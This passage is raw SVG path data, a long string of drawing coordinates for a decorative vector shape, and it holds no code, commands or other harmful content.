2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1